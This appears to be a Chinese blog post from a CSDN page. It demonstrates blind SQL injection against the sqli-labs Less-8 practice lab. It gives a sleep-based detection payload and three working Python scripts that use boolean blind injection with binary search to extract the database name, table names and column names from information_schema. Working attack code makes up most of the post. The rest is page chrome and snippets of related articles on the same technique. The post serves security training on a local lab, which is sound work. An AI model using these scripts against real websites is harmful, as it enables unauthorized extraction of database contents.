时间盲注,boolen盲注

最新推荐文章于 2025-04-30 14:41:06 发布
最新推荐文章于 2025-04-30 14:41:06 发布
阅读量247 收藏 1
点赞数 10
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Z_zz_Z___/article/details/145680322
版权

首先盲注判断

?id=1' and sleep(2)--+

发现页面存在注点,使用时间盲注脚本进行注入

import requests
 
 
def inject_database(url):
    name = ''
    for i in range(1, 20):  # 假设数据库名称长度不超过20
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)
            params = {"id": payload}
            r = requests.get(url, params=params)
 
            # 判断注入是否成功,依据靶场的返回信息
            if 'You are in' in r.text:  # 只检查包含 "You are in" 的内容,表示成功
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
 
        # 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
        if middle > 32:  # 跳过空格和不可打印字符
            name += chr(middle)
 
        # 每次获取一个字符后打印当前的数据库名
        print(f"Current database name: {name}")
 
        # 重置 low 和 high 的值
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final database name: {name}")
 
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    inject_database(url)

成功注入出数据库

更换payload和部分函数表和列

import requests
 
def inject_table_name(url, database_name):
    table_name = ''
    for i in range(1, 20):  # 假设表名长度不超过20
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            # 构造布尔盲注的 payload
            payload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- "
            params = {"id": payload}
            r = requests.get(url, params=params)
 
            # 判断注入是否成功,依据靶场的返回信息
            if 'You are in' in r.text:  # 只检查包含 "You are in" 的内容,表示成功
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
 
        # 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
        if middle > 32:  # 跳过空格和不可打印字符
            table_name += chr(middle)
 
        # 每次获取一个字符后打印当前的表名
        print(table_name)
 
        # 重置 low 和 high 的值
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final table name: {table_name}")
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"  
    database_name = "security"  # 目标数据库名称
    inject_table_name(url, database_name)

列名注入

import requests
 
def inject_column_name(url, database_name, table_name):
    column_name = ''
    for i in range(1, 20):  # 假设列名长度不超过20
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            # 构造布尔盲注的 payload
            payload = f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit 0,1),{i},1))>{middle}-- "
            params = {"id": payload}
            r = requests.get(url, params=params)
 
            # 判断注入是否成功,依据靶场的返回信息
            if 'You are in' in r.text:  # 只检查包含 "You are in" 的内容,表示成功
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
 
        # 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
        if middle > 32:  # 跳过空格和不可打印字符
            column_name += chr(middle)
 
        # 每次获取一个字符后打印当前的列名
        print(column_name)
 
        # 重置 low 和 high 的值
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final column name: {column_name}")
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"  
    database_name = "security"  # 目标数据库名称
    table_name = "users"  # 目标表名
    inject_column_name(url, database_name, table_name)

Z_zz_Z___
关注
《WEB安全渗透测试》(4)SQL入实战:时间盲注
午夜安全
10-02 8282
《WEB安全渗透测试》(4)SQL入实战:时间盲注 时间盲注:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。1)考虑使用时间盲注访问URL:http://www.tianchi.com/web/time.php?id=1返回yes......
SQL入之路之二:布尔型(boolean)
weixin_62715196的博客
08-10 1634
简单描述什么是布尔型以及对与布尔型如何进行入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔型入的合理性
时间盲注,Boolean
Enjoy_zhuo的博客
02-13 324
就是通过使用巧妙的SQL语句,观察数据库响应的时间差异来推断数据库的敏感信息,通常有时间盲注和Boolean是SQL入的一种特殊形式,发生在服务器不直接返回查询结果或错误信息的情况下。例如正常SQL入可能会返回数据库错误信息,攻击者可以直接获取信息。但时,攻击者需要通过观察页面行为的变化或时间延迟来推测数据。技术对比时间盲注Boolean依赖条件数据库响应时间差异页面返回内容的布尔状态差异攻击效率较低(需要等待延迟)较高(快速验证)适用场景。
SQL入之(boolean时间盲注)
ws1813004226的博客
05-12 896
一、boolen boolen就是系统屏蔽返回错误信息,只返回是或不是,所以我们不能直观的得到数据库信息,在这里,我们就只能通过boolen进行入。 我们依旧使用pikachu靶场进行测试,这里肯定是存在SQL入的,就不再多作演示。 我们先看一下为什么这里只能用boolen入。我们在union和boolen入处都输入: kobe' order by 3# 可以看到,uhion入是不屏蔽报错信息的,而boolen入只显示你输入有误,屏蔽了报错信息。 而只有当我们输入正确的时候,才会返
boolean型和时间型
qq_43238111的博客
05-20 893
两大类型 1.概念 1.1 为什么要使用 当我们构造错误的输入参数值,前端没有显示出报错信息,实现入 2.布尔型 2.1 原理 ①Boolean 是基于真假的判断(true or false); 不管输入什么,结果都只返回真 或假两种 情况; 通过 and 1=1 和 and 1=2 可以发现入点。 ②Boolean 型的关键在于通过表达式结果与已知值进行比对,根据比对结果判断正 确与否 ③Boolean 入是指构造 SQL 判断语句,通过查看页面的返回结果来推测哪些SQL判
SQL入之(boolean入+时间盲注
m0_74355247的博客
02-13 171
【代码】SQL入之(boolean入+时间盲注
Boolean
JieDG的博客
05-20 1128
Boolean入 有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行入的判断。这 种情况下的入,称为根据展现方式,分为boolean型和时间型。 Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现入点。 Boolean型的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。 Boolean型的判断方式 通过长度判断length():lengt
渗透之sql(时间/boolean
qq_64302290的博客
05-01 739
sql:sql意思是我们并不能在web页面中看到具体的信息,我们只能通过输入的语句的真假来判断。从而拿到我们想要的信息。我们通常使用ascii值来进行
渗透 sql 时间和boolean
kkkkwxk的博客
02-13 388
ascii(substring(database(),1,1)) -----这里表示从数据库名第一位截取一位将其转化为ascii值。and if( ascii(substring(database(),1,1))> 100,sleep(3) ,0 )--+ -----表示如果第一位的ascii值大于100就沉睡3秒,否则为假不会沉睡。
SQL布尔时间盲注
qwer2193940422的博客
02-13 313
布尔(Boolean-based Blind SQL Injection)是一种SQL入技术,用于在应用程序不直接显示数据库查询结果的情况下,通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假,进而推断出数据库中的具体信息。时间盲注(Time-based Blind SQL Injection)是一种SQL入技术,用于在应用程序没有直接回显数据库查询结果的情况下,通过构造特定的SQL查询来推测数据库中的信息。
python实现sql时间盲注
箭雨镜屋
04-26 1128
一、python代码 二、使用方法 三、测试
SQL入(boolean+时间盲注
2201_76045651的博客
03-19 494
布尔(Boolean-based Blind SQL Injection)是一种SQL入攻击技术,攻击者通过观察应用程序的布尔响应(真/假)来推断数据库中的信息。这种攻击通常发生在应用程序不直接返回数据库错误信息或查询结果,但会根据查询条件返回不同的响应(如页面内容、HTTP状态码等)时。
渗透测试——布尔时间盲注
zjdda的博客
07-12 2202
简要讲解的两种类型:布尔时间盲注
10、入篇--时间盲注、延时入】
WX公众号-小白学安全
04-05 1698
文章目录原理利用防范靶场 原理 利用 防范 靶场
使用Burpsuite进行半自动入 布尔时间盲注 个人总结
代码审计
03-26 4312
利用前提 , 页面上没有显示位 , 也没有输出 $ QL 语句执行错误信息 。 正确的 SQL 语句和错误的 SQL 语句返回页面都 0 样 , . 但是加入 s 丨 p ( 5 ) 条件之 后 , 页面的返回速度明显慢了 5 秒 。 优点 . 不需要显示位 , 不需要出错信息 。 速度慢 , . 耗费大量时间 。 payload: and if(length(database())=8,sleep(10),1) --+ 判断当前数据库库名的长度 如果数据库库名长度大于等于8,则mysql查询休眠10
基于ssm的校园外卖配送系统(源码+文档)
luoluoal的博客
04-30 1345
校园外卖配送系统的主要使用者分为:1、用户的功能及权限用户登录册后,进入系统对个人中心,订单信息管理,订单取消管理,配送接单管理,取消配送管理,送达通知管理等功能进行操作管理。2、配送员的功能及权限用户登录册后,进入系统对个人中心,订单信息管理,配送接单管理,取消配送管理,送达通知管理等功能进行操作管理。3、管理员的功能及权限用户信息的添加和管理,校园外卖配送详细信息添加和管理和文档信息添加和管理以及网站信息管理,这些都是管理员的功能💕💕作者:落落。
【MySQL】表的增删查改 + 分组查询
2203_76003626的博客
04-28 1172
表的增删查改 + 分组查询
零改造实现MySQL加密:安当TDE透明加密与KSP密钥管理系统的创新实践
最新发布
www.andang.cn
04-30 923
安当TDE透明加密系统与KSP密钥管理系统的组合,为企业提供了"免改造、高性能、全合规"的数据库加密解决方案。通过创新的三层加密引擎、智能性能优化和企业级密钥管理,成功破解了传统加密方案的技术桎梏。在数字化转型加速的今天,这种"安全-性能-成本"的完美平衡,将成为企业构建新一代数据库安全底座的核心选择。未来,随着AI和隐私计算技术的融合,数据库加密将进入智能加密新时代,而安当技术已在这条赛道上构建起坚实的技术壁垒。
C# dataGridView分页
JQLvopkk的博客
04-30 327
/ MySQL连接字符串。// 每页加载的记录数量。LoadData();// 初始化加载数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值